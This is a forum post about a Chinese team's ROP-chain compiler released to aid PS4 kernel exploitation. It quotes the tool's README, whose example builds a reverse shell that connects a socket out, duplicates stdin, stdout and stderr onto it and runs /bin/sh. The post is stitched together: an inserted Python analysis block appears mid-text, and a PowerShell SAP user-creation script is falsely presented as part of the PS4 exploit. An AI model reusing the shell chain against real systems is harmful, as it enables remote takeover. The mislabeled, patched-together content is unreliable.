PS4 Jailbreaking. Thread starter: PSXHAX. Start date: Oct 27, 2016 at 11:35 PM.
Following recent research from PlayStation 4 developers into the 4.01 PS4 Jailbreak by Chaitin Tech, today the Chinese PS4 Jailbreaking Team have released a ROP (Return Oriented Programming) tool on their Pro GIT to aid developers in exploiting the PlayStation 4.

Download: pro-master.zip / GIT

PSXHAX Moderator @Centrino points out that the GIT work is incomplete (referencing line 41), meaning it contains only partial information and end-users can't do anything with it just yet.

In other words, although Chaitin Tech are not teasing, they also are not spoon feeding (giving away their full exploit).

Here is a snippet from #ps4dev on IRC via @Fimo for those interested:

[rck`d] the nonsecure browser has no jit, only the secure browser now (used for PSN store, etc) has JIT
[rck`d] Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process

:sneaky: Everyone can draw their own conclusions, but thus far it wouldn't surprise me if the Chinese Team is just a 'smoke and mirrors' scheme as dongle douchebags start re-DRMing the exploit to profit off PS4 sceners... then when people whine they'll direct them to this GIT of incomplete code as a 'free' alternative to their useless 'product', but hopefully I'm mistaken. :whistle:

Anyhow, to quote from the README.md:

PRO: PROgramming ROP like a PRO

This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged processes. We have to write the kernel exploitation in ROP, like what has been done in the HENKaku jailbreak.

Build
Code:
pip install git+https://github.com/chaitin/pro
If you have modified the pro.g4 file, use the following command to generate a new lexer and parser.
Code:
cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4
Examples
Code:
toy {
    {% include "gadgets.pro" %}
    {% include "glibc.pro" %}
    const AF_INET(2);
    const SOCK_STREAM(1);
    const IPPROTO_IP(0);
    var fd;
    socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
    store_rdx_rax(&fd, undefined);
    printf("socket fd = %d\n", fd);
    array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
    connect(fd, addr, 0x10);
    {% for i in range(3): %}
        dup2(fd, {{i}});
    {% endfor %}
    system("/bin/sh");
    exit(1);
}
Usage

A BIG TODO. Just try and learn by yourself.

Quick Guide

All expressions should be evaluated during compilation; Const/Func should be initialized in their declaration.

Func is initialized with <Base, Offset, Signature>. Base/Offset is used for relocation; Signature determines the calling convention of the Func.

Array can be declared with a size (Int) or directly initialized with its content (String).

For loops should be written in the template script; it will be rendered before compilation. For more information, check Jinja2.
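The syntax the Quick Guide describes, as an added example (not code from the README or from the pro tool): a small Python parser for the subset of PRO shown in the toy script, which resolves const arguments in each call and decodes the array handed to connect() as a struct sockaddr_in, the first thing an analyst reading such a chain script wants to know. The regexes are an assumption about the syntax, not the tool's pro.g4 grammar, and the Jinja2 loop is assumed to have been rendered already.

```python
import re
# Constructed sample: the README's toy script with the includes dropped and the
# Jinja2 loop already rendered, since PRO renders the template before compiling.
TOY = r'''toy {
    const AF_INET(2);
    const SOCK_STREAM(1);
    const IPPROTO_IP(0);
    socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
    store_rdx_rax(&fd, undefined);
    array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
    connect(fd, addr, 0x10);
    dup2(fd, 0);
    system("/bin/sh");
    exit(1);
}'''

# Assumed patterns for the syntax subset shown in the README (not the real pro.g4 grammar).
CONST_RE = re.compile(r'const\s+(\w+)\((\w+)\);')
FUNC_RE = re.compile(r'func\s+(\w+)<(\w+),\s*(0x[0-9a-fA-F]+),\s*"([^"]*)">;')
ARRAY_RE = re.compile(r'array\s+(\w+)\["((?:\\x[0-9a-fA-F]{2})+)"\];')
CALL_RE = re.compile(r'^\s*(\w+)\(([^)]*)\);', re.M)

def parse_pro(src):
    # consts: name -> int; funcs: name -> (base, offset, signature); arrays: name -> bytes
    consts = {n: int(v, 0) for n, v in CONST_RE.findall(src)}
    funcs = {n: (b, int(o, 16), s) for n, b, o, s in FUNC_RE.findall(src)}
    arrays = {n: bytes.fromhex(lit.replace('\\x', '')) for n, lit in ARRAY_RE.findall(src)}
    calls = [(n, [a.strip() for a in args.split(',') if a.strip()])
             for n, args in CALL_RE.findall(src)]  # ordered (name, raw args)
    return consts, funcs, arrays, calls

def decode_sockaddr_in(raw):
    # struct sockaddr_in: sin_family (host order), sin_port (network order), IPv4 address
    family = int.from_bytes(raw[:2], 'little')
    port = int.from_bytes(raw[2:4], 'big')
    return family, port, '.'.join(str(b) for b in raw[4:8])

def summarize(src):
    # One line per call with const args resolved; connect()'s sockaddr is decoded
    consts, funcs, arrays, calls = parse_pro(src)
    out = []
    for name, args in calls:
        resolved = ', '.join(str(consts.get(a, a)) for a in args)
        origin = 'local func' if name in funcs else 'from include'
        out.append(f'{name}({resolved})  [{origin}]')
        if name == 'connect' and len(args) > 1 and args[1] in arrays:
            fam, port, ip = decode_sockaddr_in(arrays[args[1]])
            out.append(f'  sockaddr_in: family={fam} addr={ip} port={port}')
    return out
```

Running summarize(TOY) shows the toy chain dialing 0.0.0.0 on port 16705 (0x4141) before duplicating the socket over stdin and spawning a shell.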

From Pastebin.com, here is what may be part of the Chaitin PS4 exploit used:
Code:
# Function that returns the directory the script is running from
# Which variable is available depends on the PowerShell version
function Get-ScriptDir() {
    if( $PSVersionTable.PSVersion.Major -ge 3) {
        # Data from $PSScriptRoot
        $ScriptDir = $PSScriptRoot
    }
    else {
        # Data from $MyInvocation.MyCommand.Path
        $ScriptDir = Split-Path $MyInvocation.MyCommand.Path -Parent
    }
    return $ScriptDir
}


# Function that loads the NetWeaver .Net Connector assemblies
function Load-Nco {
    $ScriptDir = Get-ScriptDir

    $Size = [System.IntPtr]::Size
    if ($Size -eq 4) {
        $Path = $ScriptDir + "\x86\"
    }
    elseif ($Size -eq 8) {
        $Path = $ScriptDir + "\x64\"
    }

    [Reflection.Assembly]::LoadFile($Path + "sapnco.dll") > $Null
    [Reflection.Assembly]::LoadFile($Path + "sapnco_utils.dll") > $Null
}

# -----
# Configure the SAP connection destination
# -----
Function Get-Destination {
    $cfgParams = New-Object SAP.Middleware.Connector.RfcConfigParameters
    $cfgParams.Add("NAME", "TEST")
    $cfgParams.Add("ASHOST", "ABAP")
    $cfgParams.Add("SYSNR", "00")
    $cfgParams.Add("CLIENT", "400")
    $cfgParams.Add("USER", "User")

    # Prompt for the password as a SecureString, copy it to a BSTR only long
    # enough to hand it to the connector, then zero and free the BSTR
    $secPasswd = Read-Host -Prompt "Password" -AsSecureString
    $ptrPasswd = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secPasswd)
    $passwd = [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptrPasswd)
    [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptrPasswd)
    $cfgParams.Add("PASSWD", $passwd)

    Return [SAP.Middleware.Connector.RfcDestinationManager]::GetDestination($cfgParams)
}

# ----
# Execute the SAP function modules
# ----
Function Invoke-SAPFunctionModule {
    $destination = Get-Destination

    # Metadata
    Try {
        [SAP.Middleware.Connector.IRfcFunction]$bapiCreateUser = $destination.Repository.CreateFunction("BAPI_USER_CREATE1")
        [SAP.Middleware.Connector.IRfcFunction]$bapiTransactionCommit = $destination.Repository.CreateFunction("BAPI_TRANSACTION_COMMIT")
    }
    Catch [SAP.Middleware.Connector.RfcBaseException] {
        Write-Host "Failed"
        Break
    }

    # Set Import Parameters
    $bapiCreateUser.SetValue("USERNAME", "MYUSER")
    [SAP.Middleware.Connector.IRfcStructure]$imPassword = $bapiCreateUser.GetStructure("PASSWORD")
    $imPassword.SetValue("BAPIPWD", "initial")
    [SAP.Middleware.Connector.IRfcStructure]$imAddress = $bapiCreateUser.GetStructure("ADDRESS")
    $imAddress.SetValue("FIRSTNAME", "My")
    $imAddress.SetValue("LASTNAME", "User")
    $imAddress.SetValue("FULLNAME", "MyUser")

    # Open context
    [SAP.Middleware.Connector.RfcSessionManager]::BeginContext($destination) > $Null

    # Call the function modules
    Try {
        # Create the user
        $bapiCreateUser.Invoke($destination)
        [SAP.Middleware.Connector.IRfcTable]$return = $bapiCreateUser.GetTable("RETURN")
        ForEach ($line in $return) {
            Write-Host $line.GetValue("TYPE") "-" $line.GetValue("MESSAGE")
        }
        # Commit the transaction
        $bapiTransactionCommit.Invoke($destination)
    }
    Finally {
        # Close the context
        [SAP.Middleware.Connector.RfcSessionManager]::EndContext($destination) > $Null
    }
}


# ----
# Main function
# ----
Function Main() {
    Load-NCo
    Invoke-SAPFunctionModule
}


# ------------------------------
# Main
# ------------------------------

Main
Thanks to @spyro2670 in the Shoutbox and @simobuoncuo for the tip!
[Image: Chaitin Tech PS4 Jailbreak ROP Tool.jpg]